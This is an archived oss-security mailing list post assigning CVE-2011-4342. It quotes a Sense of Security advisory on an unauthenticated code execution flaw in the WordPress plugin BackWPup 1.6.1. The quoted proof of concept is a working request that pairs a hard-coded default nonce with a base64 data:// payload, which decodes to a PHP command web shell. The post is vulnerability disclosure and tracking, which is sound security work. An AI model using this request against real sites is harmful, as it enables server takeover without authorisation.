Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 22 Nov 2011 12:55:11 -0700
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Henri Salo <henri@...v.fi>
Subject: Re: Fwd: Wordpress plugin BackWPup Remote and Local
 Code Execution Vulnerability - SOS-11-003

On 11/22/2011 03:07 AM, Henri Salo wrote:
> ----- Forwarded message from Lists <lists@...seofsecurity.com.au> -----
>
> Date: Mon, 28 Mar 2011 15:10:39 +1100
> From: Lists <lists@...seofsecurity.com.au>
> To: lists@...seofsecurity.com.au
> Subject: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code
> 	Execution Vulnerability - SOS-11-003
> X-Mailer: Microsoft Outlook Express 6.00.3790.4657
>
> Sense of Security - Security Advisory - SOS-11-003
>
> Release Date.                  28-Mar-2011
> Last Update.                   -
> Vendor Notification Date.      25-Mar-2010
> Product.                       Wordpress Plugin BackWPup
> Platform.                      Independent
> Affected versions.             1.6.1 (verified), possibly others
> Severity Rating.               High
> Impact.                        System Access
> Attack Vector.                 Remote without authentication
> Solution Status.               Upgrade to version 1.7.1
> CVE reference.                 Not yet assigned
>
> Details.
> A vulnerability has been discovered in the Wordpress plugin BackWPup 
> 1.6.1 which can be exploited to execute local or remote code on the web 
> server. The Input passed to the component "wp_xml_export.php" via the 
> "wpabs" variable allows the inclusion and execution of local or remote 
> PHP files as long as a "_nonce" value is known. The "_nonce" value 
> relies on a static constant which is not defined in the script meaning 
> that it defaults to the value "822728c8d9".
>
> Proof of Concept.
> wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
> vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX           
> Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0   
> ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
> sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
>
> Solution.
> Upgrade to version 1.7.1
>
> Discovered by.
> Phil Taylor - Sense of Security Labs.
>
> Sense of Security Pty Ltd
> Level 8, 66 King St
> Sydney NSW 2000
> AUSTRALIA
> T: +61 (0)2 9290 4444
> F: +61 (0)2 9290 4455
> W: http://www.senseofsecurity.com.au
> E: info@...seofsecurity.com.au
> Twitter: @ITsecurityAU
>
> The latest version of this advisory can be found at:
> http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
>
> Other Sense of Security advisories can be found at:
> http://www.senseofsecurity.com.au/research/it-security-advisories.php
> ----- End forwarded message -----
>
> Can we assign CVE-identifier for this issue?

Please use CVE-2011-4342 for this issue.

> Original advisory: http://seclists.org/fulldisclosure/2011/Mar/328 / http://www.senseofsecurity.com.au/advisories/SOS-11-003
> Fixed in version: 1.7.2 (http://wordpress.org/support/topic/plugin-backwpup-remote-and-local-codeexecution-vulnerability-sos-11-003)
> OSVDB: http://osvdb.org/show/osvdb/71481
> http://www.exploit-db.com/exploits/17056/
>
> Best regards,
> Henri Salo


-- 

-Kurt Seifried / Red Hat Security Response Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ